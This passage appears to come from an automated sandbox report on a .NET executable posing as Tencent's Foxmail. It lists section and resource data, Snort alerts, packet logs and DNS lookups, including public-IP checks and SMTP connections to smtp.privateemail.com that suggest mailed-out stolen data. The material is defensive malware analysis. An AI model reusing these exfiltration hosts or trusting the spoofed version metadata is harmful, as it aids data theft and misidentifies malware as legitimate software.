                                                                                                  .reloc0x1980000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                  RT_ICON0x1921900x468GLS_BINARY_LSB_FIRST
                                                                                                  RT_ICON0x1925f80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4286386453, next used block 4285534489
                                                                                                  RT_ICON0x1936a00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4278198588, next used block 4278263872
                                                                                                  RT_GROUP_ICON0x195c480x30data
                                                                                                  RT_VERSION0x195c780x324data
                                                                                                  RT_MANIFEST0x195f9c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  mscoree.dll_CorExeMain

                                                                                                  Version Infos

                                                                                                  DescriptionData
                                                                                                  Translation0x0000 0x04b0
                                                                                                  LegalCopyrightCopyright (C) 2017
                                                                                                  Assembly Version7.2.12.13
                                                                                                  InternalNameFoxmail.exe
                                                                                                  FileVersion7.2.12.13
                                                                                                  CompanyNameTencent Inc.
                                                                                                  CommentsFoxmail 7.2
                                                                                                  ProductNameFoxmail 7.2
                                                                                                  ProductVersion7.2.12.13
                                                                                                  FileDescriptionFoxmail
                                                                                                  OriginalFilenameFoxmail.exe

                                                                                                  Network Behavior

                                                                                                  Snort IDS Alerts

                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  02/02/21-08:51:54.127437TCP1201ATTACK-RESPONSES 403 Forbidden8049729104.16.155.36192.168.2.7
                                                                                                  02/02/21-08:51:54.375992TCP1201ATTACK-RESPONSES 403 Forbidden8049729104.16.155.36192.168.2.7
                                                                                                  02/02/21-08:53:01.225853TCP1201ATTACK-RESPONSES 403 Forbidden8049769104.16.155.36192.168.2.7

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Feb 2, 2021 08:51:54.033477068 CET4972980192.168.2.7104.16.155.36
                                                                                                  Feb 2, 2021 08:51:54.073527098 CET8049729104.16.155.36192.168.2.7
                                                                                                  Feb 2, 2021 08:51:54.073673964 CET4972980192.168.2.7104.16.155.36
                                                                                                  Feb 2, 2021 08:51:54.075356960 CET4972980192.168.2.7104.16.155.36
                                                                                                  Feb 2, 2021 08:51:54.115274906 CET8049729104.16.155.36192.168.2.7
                                                                                                  Feb 2, 2021 08:51:54.127437115 CET8049729104.16.155.36192.168.2.7
                                                                                                  Feb 2, 2021 08:51:54.347234964 CET4972980192.168.2.7104.16.155.36
                                                                                                  Feb 2, 2021 08:51:54.375992060 CET8049729104.16.155.36192.168.2.7
                                                                                                  Feb 2, 2021 08:51:54.376856089 CET4972980192.168.2.7104.16.155.36
                                                                                                  Feb 2, 2021 08:52:04.636801958 CET4973180192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:04.696549892 CET8049731131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:04.696633101 CET4973180192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:04.697185040 CET4973180192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:04.757730961 CET8049731131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:04.757770061 CET8049731131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:04.757795095 CET8049731131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:04.757899046 CET4973180192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:04.758519888 CET4973180192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:04.817929983 CET8049731131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:05.157845974 CET4973280192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:05.216881037 CET8049732131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:05.217084885 CET4973280192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:05.217569113 CET4973280192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:05.276770115 CET8049732131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:05.276901960 CET8049732131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:05.276920080 CET8049732131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:05.276995897 CET4973280192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:05.277327061 CET4973280192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:05.338064909 CET8049732131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.048981905 CET49733443192.168.2.7104.21.19.200
                                                                                                  Feb 2, 2021 08:52:13.095045090 CET44349733104.21.19.200192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.095906973 CET49733443192.168.2.7104.21.19.200
                                                                                                  Feb 2, 2021 08:52:13.155304909 CET49733443192.168.2.7104.21.19.200
                                                                                                  Feb 2, 2021 08:52:13.201467037 CET44349733104.21.19.200192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.208401918 CET44349733104.21.19.200192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.208453894 CET44349733104.21.19.200192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.208547115 CET49733443192.168.2.7104.21.19.200
                                                                                                  Feb 2, 2021 08:52:13.221199989 CET49733443192.168.2.7104.21.19.200
                                                                                                  Feb 2, 2021 08:52:13.268449068 CET44349733104.21.19.200192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.269627094 CET44349733104.21.19.200192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.317687988 CET49733443192.168.2.7104.21.19.200
                                                                                                  Feb 2, 2021 08:52:13.393908024 CET49733443192.168.2.7104.21.19.200
                                                                                                  Feb 2, 2021 08:52:13.439867020 CET44349733104.21.19.200192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.497458935 CET44349733104.21.19.200192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.551959991 CET49733443192.168.2.7104.21.19.200
                                                                                                  Feb 2, 2021 08:52:13.723737001 CET4973480192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:13.783137083 CET8049734131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.783849001 CET4973480192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:13.783994913 CET4973480192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:13.844903946 CET8049734131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.845175028 CET8049734131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.845184088 CET8049734131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.845391035 CET4973480192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:13.845911980 CET4973480192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:13.846653938 CET49733443192.168.2.7104.21.19.200
                                                                                                  Feb 2, 2021 08:52:13.892366886 CET44349733104.21.19.200192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.905188084 CET8049734131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.925117970 CET44349733104.21.19.200192.168.2.7
                                                                                                  Feb 2, 2021 08:52:13.973860979 CET49733443192.168.2.7104.21.19.200
                                                                                                  Feb 2, 2021 08:52:14.101875067 CET4973580192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:14.161318064 CET8049735131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:14.162257910 CET4973580192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:14.162292004 CET4973580192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:14.221921921 CET8049735131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:14.221944094 CET8049735131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:14.221972942 CET8049735131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:14.222125053 CET4973580192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:14.222654104 CET4973580192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:14.223448992 CET49733443192.168.2.7104.21.19.200
                                                                                                  Feb 2, 2021 08:52:14.282454967 CET8049735131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:14.286712885 CET44349733104.21.19.200192.168.2.7
                                                                                                  Feb 2, 2021 08:52:14.333252907 CET49733443192.168.2.7104.21.19.200
                                                                                                  Feb 2, 2021 08:52:14.451637030 CET4973680192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:14.510814905 CET8049736131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:14.510978937 CET4973680192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:14.511794090 CET4973680192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:14.571150064 CET8049736131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:14.571176052 CET8049736131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:14.571185112 CET8049736131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:14.571312904 CET4973680192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:14.571866989 CET4973680192.168.2.7131.186.113.70
                                                                                                  Feb 2, 2021 08:52:14.632783890 CET8049736131.186.113.70192.168.2.7
                                                                                                  Feb 2, 2021 08:52:22.430808067 CET49741587192.168.2.7199.193.7.228
                                                                                                  Feb 2, 2021 08:52:22.430866003 CET49740587192.168.2.7199.193.7.228
                                                                                                  Feb 2, 2021 08:52:22.621337891 CET58749740199.193.7.228192.168.2.7
                                                                                                  Feb 2, 2021 08:52:22.621368885 CET58749741199.193.7.228192.168.2.7
                                                                                                  Feb 2, 2021 08:52:22.621531963 CET49740587192.168.2.7199.193.7.228
                                                                                                  Feb 2, 2021 08:52:22.621571064 CET49741587192.168.2.7199.193.7.228
                                                                                                  Feb 2, 2021 08:52:22.646863937 CET49741587192.168.2.7199.193.7.228
                                                                                                  Feb 2, 2021 08:52:22.813158989 CET58749740199.193.7.228192.168.2.7
                                                                                                  Feb 2, 2021 08:52:22.813167095 CET58749741199.193.7.228192.168.2.7
                                                                                                  Feb 2, 2021 08:52:22.813273907 CET49741587192.168.2.7199.193.7.228
                                                                                                  Feb 2, 2021 08:52:22.813688993 CET49740587192.168.2.7199.193.7.228
                                                                                                  Feb 2, 2021 08:52:22.837110043 CET58749741199.193.7.228192.168.2.7
                                                                                                  Feb 2, 2021 08:52:22.837198019 CET49741587192.168.2.7199.193.7.228
                                                                                                  Feb 2, 2021 08:52:22.837585926 CET58749741199.193.7.228192.168.2.7
                                                                                                  Feb 2, 2021 08:52:22.837647915 CET49741587192.168.2.7199.193.7.228
                                                                                                  Feb 2, 2021 08:52:22.881418943 CET49740587192.168.2.7199.193.7.228
                                                                                                  Feb 2, 2021 08:52:23.003695965 CET58749740199.193.7.228192.168.2.7
                                                                                                  Feb 2, 2021 08:52:23.004148006 CET58749740199.193.7.228192.168.2.7

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Feb 2, 2021 08:51:30.116107941 CET5871753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:30.172230959 CET53587178.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:31.337563992 CET5976253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:31.400734901 CET53597628.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:32.221174002 CET5432953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:32.273967981 CET53543298.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:33.975642920 CET5805253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:34.026186943 CET53580528.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:35.326277971 CET5400853192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:35.374140978 CET53540088.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:38.306018114 CET5945153192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:38.362137079 CET53594518.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:39.282435894 CET5291453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:39.335496902 CET53529148.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:40.727047920 CET6456953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:40.777889967 CET53645698.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:42.254206896 CET5281653192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:42.310305119 CET53528168.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:43.344412088 CET5078153192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:43.392345905 CET53507818.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:44.466734886 CET5423053192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:44.516629934 CET53542308.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:45.447211981 CET5491153192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:45.477125883 CET4995853192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:45.505021095 CET53549118.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:45.529052973 CET53499588.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:46.893997908 CET5086053192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:46.941816092 CET53508608.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:48.213689089 CET5045253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:48.261679888 CET53504528.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:50.513789892 CET5973053192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:50.572828054 CET53597308.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:52.579267979 CET5931053192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:52.630502939 CET53593108.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:53.379492044 CET5191953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:53.438116074 CET53519198.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:51:53.900830984 CET6429653192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:51:53.960005045 CET53642968.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:00.056057930 CET5668053192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:00.112185001 CET53566808.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:04.437439919 CET5882053192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:04.487238884 CET53588208.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:04.516426086 CET6098353192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:04.566323042 CET53609838.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:12.981060028 CET4924753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:13.041534901 CET53492478.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:17.680474997 CET5228653192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:17.738408089 CET53522868.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:17.837726116 CET5606453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:17.900806904 CET53560648.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:18.850114107 CET6374453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:18.898106098 CET53637448.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:22.276596069 CET6145753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:22.335807085 CET53614578.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:23.339813948 CET5836753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:23.400106907 CET53583678.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:24.584064960 CET6059953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:24.643059969 CET53605998.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:25.612889051 CET5957153192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:25.671786070 CET53595718.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:27.152910948 CET5268953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:27.212202072 CET53526898.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:28.490356922 CET5029053192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:28.546897888 CET53502908.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:30.280812979 CET6042753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:30.337150097 CET53604278.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:32.047787905 CET5620953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:32.104201078 CET53562098.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:33.669477940 CET5958253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:33.717605114 CET53595828.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:33.987025976 CET6094953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:34.043262005 CET53609498.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:36.163332939 CET5854253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:36.223865032 CET53585428.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:37.289861917 CET5917953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:37.348948956 CET53591798.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:38.025207043 CET6092753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:38.086824894 CET53609278.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:40.204969883 CET5785453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:40.252991915 CET53578548.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:40.299511909 CET6202653192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:40.356125116 CET53620268.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:40.632177114 CET5945353192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:40.688971043 CET53594538.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:42.364404917 CET6246853192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:42.421161890 CET53624688.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:43.485554934 CET5256353192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:43.541801929 CET53525638.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:44.979003906 CET5472153192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:45.028855085 CET53547218.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:47.347949982 CET6282653192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:47.405642033 CET53628268.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:47.588212013 CET6204653192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:47.647037029 CET53620468.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:50.374495983 CET5122353192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:50.431301117 CET53512238.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:50.658818007 CET6390853192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:50.706617117 CET53639088.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:53.261665106 CET4922653192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:53.313534021 CET53492268.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:56.275100946 CET6021253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:56.331607103 CET53602128.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:59.256263018 CET5886753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:59.312505007 CET53588678.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:52:59.423389912 CET5086453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:52:59.482912064 CET53508648.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:00.292697906 CET6150453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:00.353419065 CET53615048.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:01.004070044 CET6023153192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:01.060314894 CET53602318.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:02.156910896 CET5009553192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:02.204837084 CET53500958.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:05.881093979 CET5965453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:05.928864956 CET53596548.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:09.224340916 CET5823353192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:09.281547070 CET53582338.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:10.724493980 CET5682253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:10.772320032 CET53568228.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:18.055473089 CET6257253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:18.103461981 CET53625728.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:20.778110027 CET5717953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:20.837517023 CET53571798.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:24.139029980 CET5612453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:24.195363045 CET53561248.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:26.415201902 CET6228753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:26.463123083 CET53622878.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:26.516926050 CET5464453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:26.564953089 CET53546448.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:27.549843073 CET5915953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:27.599453926 CET53591598.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:35.453262091 CET5792453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:35.512851000 CET53579248.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:35.593250036 CET5171253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:35.649574995 CET53517128.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:38.249537945 CET5886553192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:38.297360897 CET53588658.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:42.031311989 CET6433753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:42.090331078 CET53643378.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:45.081511021 CET5040753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:45.116350889 CET6107553192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:45.140338898 CET53504078.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:45.172378063 CET53610758.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:12.793908119 CET5495253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:12.842149973 CET53549528.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:15.301547050 CET5918653192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:15.354489088 CET53591868.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:15.887363911 CET5228053192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:15.948564053 CET53522808.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:19.049554110 CET5179453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:19.097718954 CET53517948.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:22.277606964 CET5081553192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:22.327384949 CET53508158.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:23.821609020 CET5849853192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:23.880672932 CET53584988.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:33.298855066 CET5686253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:33.360323906 CET53568628.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:36.197577953 CET6180753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:36.201062918 CET5200953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:36.256642103 CET53618078.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:36.260183096 CET53520098.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:38.931622028 CET5864853192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:38.991988897 CET53586488.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:40.716998100 CET5933753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:40.767158031 CET53593378.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:41.961437941 CET5926953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:42.011138916 CET53592698.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:43.813313961 CET4980253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:43.863847971 CET53498028.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:48.922760010 CET5070653192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:48.980370045 CET53507068.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:51.820154905 CET5515353192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:51.831574917 CET5974453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:51.876228094 CET53551538.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:51.879745960 CET53597448.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:54.559792995 CET5998753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:54.580755949 CET6127253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:54.609613895 CET53599878.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:54.630439997 CET53612728.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:57.268471956 CET5435253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:57.316422939 CET53543528.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:57.419401884 CET6069653192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:57.477765083 CET53606968.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:55:11.386878967 CET5913953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:55:11.436451912 CET53591398.8.8.8192.168.2.7

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Feb 2, 2021 08:51:53.379492044 CET192.168.2.78.8.8.80xf445Standard query (0)69.170.12.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                  Feb 2, 2021 08:51:53.900830984 CET192.168.2.78.8.8.80x6da6Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:04.437439919 CET192.168.2.78.8.8.80x6b02Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:04.516426086 CET192.168.2.78.8.8.80xc21cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:12.981060028 CET192.168.2.78.8.8.80x872aStandard query (0)freegeoip.appA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:22.276596069 CET192.168.2.78.8.8.80x849cStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:23.339813948 CET192.168.2.78.8.8.80xb3beStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:24.584064960 CET192.168.2.78.8.8.80x9e74Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
